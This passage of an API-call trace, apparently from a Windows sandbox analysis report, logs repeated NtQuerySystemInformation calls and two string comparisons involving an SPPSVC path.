SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc20, Length=0x50, ResultLength=0x0) [0289.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc20, Length=0x50, ResultLength=0x0) [0289.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db10, Length=0x50, ResultLength=0x0) [0289.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db10, Length=0x50, ResultLength=0x0) [0289.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db10, Length=0x50, ResultLength=0x0) [0289.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db10, Length=0x50, ResultLength=0x0) [0289.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da40, Length=0x38, ResultLength=0x0) [0289.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d870, Length=0x28, ResultLength=0x0) [0289.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d870, Length=0x28, ResultLength=0x0) [0289.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d870, Length=0x28, ResultLength=0x0) [0289.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d8e0, Length=0x28, ResultLength=0x0) [0289.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da40, Length=0x38, ResultLength=0x0) [0289.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d960, Length=0x28, ResultLength=0x0) [0289.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d960, Length=0x28, ResultLength=0x0) [0289.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da40, Length=0x38, ResultLength=0x0) [0289.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d8c0, Length=0x20, ResultLength=0x0) [0289.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d840, Length=0x20, ResultLength=0x0) [0289.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d840, Length=0x20, ResultLength=0x0) [0289.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d840, Length=0x20, ResultLength=0x0) [0289.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da40, Length=0x38, ResultLength=0x0) [0289.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d8c0, Length=0x20, ResultLength=0x0) [0289.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d850, Length=0x20, ResultLength=0x0) [0289.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d850, Length=0x20, ResultLength=0x0) [0289.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc20, Length=0x50, ResultLength=0x0) [0289.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc20, Length=0x50, ResultLength=0x0) [0289.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc20, Length=0x50, ResultLength=0x0) [0289.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db10, Length=0x50, ResultLength=0x0) [0289.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db10, Length=0x50, ResultLength=0x0) [0289.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db10, Length=0x50, ResultLength=0x0) [0289.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db10, Length=0x50, ResultLength=0x0) [0289.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da40, Length=0x38, ResultLength=0x0) [0289.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d870, Length=0x28, ResultLength=0x0) [0289.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d870, Length=0x28, ResultLength=0x0) [0289.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d870, Length=0x28, ResultLength=0x0) [0289.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d8e0, Length=0x28, ResultLength=0x0) [0289.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da40, Length=0x38, ResultLength=0x0) [0289.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d960, Length=0x28, ResultLength=0x0) [0289.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d960, Length=0x28, ResultLength=0x0) [0289.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da40, Length=0x38, ResultLength=0x0) [0289.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d8c0, Length=0x20, ResultLength=0x0) [0289.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d840, Length=0x20, ResultLength=0x0) [0289.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d840, Length=0x20, ResultLength=0x0) [0289.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d840, Length=0x20, ResultLength=0x0) [0289.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da40, Length=0x38, ResultLength=0x0) [0289.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d8c0, Length=0x20, ResultLength=0x0) [0289.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d850, Length=0x20, ResultLength=0x0) [0289.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d850, Length=0x20, ResultLength=0x0) [0289.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dcd0, Length=0x50, ResultLength=0x0) [0289.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc50, Length=0x28, ResultLength=0x0) [0289.897] _wcsicmp (_String1="SPPSVC\\0ff1ce15-a989-479d-af46-f275c6370663\\2cb19a15-bab2-4fcb-acee-4bde5be207a5", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0289.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dcd0, Length=0x50, ResultLength=0x0) [0289.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dcd0, Length=0x50, ResultLength=0x0) [0289.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dcd0, Length=0x50, ResultLength=0x0) [0289.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc00, Length=0x38, ResultLength=0x0) [0289.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da30, Length=0x28, ResultLength=0x0) [0289.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da30, Length=0x28, ResultLength=0x0) [0289.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da30, Length=0x28, ResultLength=0x0) [0289.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217daa0, Length=0x28, ResultLength=0x0) [0289.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc00, Length=0x38, ResultLength=0x0) [0289.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db20, Length=0x28, ResultLength=0x0) [0289.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db20, Length=0x28, ResultLength=0x0) [0289.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc00, Length=0x38, ResultLength=0x0) [0289.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da80, Length=0x20, ResultLength=0x0) [0289.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da00, Length=0x20, ResultLength=0x0) [0289.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da00, Length=0x20, ResultLength=0x0) [0289.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da00, Length=0x20, ResultLength=0x0) [0289.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc00, Length=0x38, ResultLength=0x0) [0289.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da80, Length=0x20, ResultLength=0x0) [0289.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da10, Length=0x20, ResultLength=0x0) [0289.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da10, Length=0x20, ResultLength=0x0) [0289.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dcd0, Length=0x50, ResultLength=0x0) [0289.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc50, Length=0x28, ResultLength=0x0) [0289.912] _wcsicmp (_String1="SPPSVC\\0ff1ce15-a989-479d-af46-f275c6370663\\2cb19a15-bab2-4fcb-acee-4bde5be207a5", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0289.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dcd0, Length=0x50, ResultLength=0x0) [0289.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dcd0, Length=0x50, ResultLength=0x0) [0289.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dcd0, Length=0x50, ResultLength=0x0) [0289.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc00, Length=0x38, ResultLength=0x0) [0289.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da30, Length=0x28, ResultLength=0x0) [0289.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da30, Length=0x28, ResultLength=0x0) [0289.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da30, Length=0x28, ResultLength=0x0) [0289.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217daa0, Length=0x28, ResultLength=0x0) [0289.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc00, Length=0x38, ResultLength=0x0) [0289.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db20, Length=0x28, ResultLength=0x0) [0289.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db20, Length=0x28, ResultLength=0x0) [0289.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc00, Length=0x38, ResultLength=0x0) [0289.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da80, Length=0x20, ResultLength=0x0) [0289.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da00, Length=0x20, ResultLength=0x0) [0289.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da00, Length=0x20, ResultLength=0x0) [0289.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da00, Length=0x20, ResultLength=0x0) [0289.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc00, Length=0x38, ResultLength=0x0) [0289.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da80, Length=0x20, ResultLength=0x0) [0289.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da10, Length=0x20, ResultLength=0x0) [0289.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 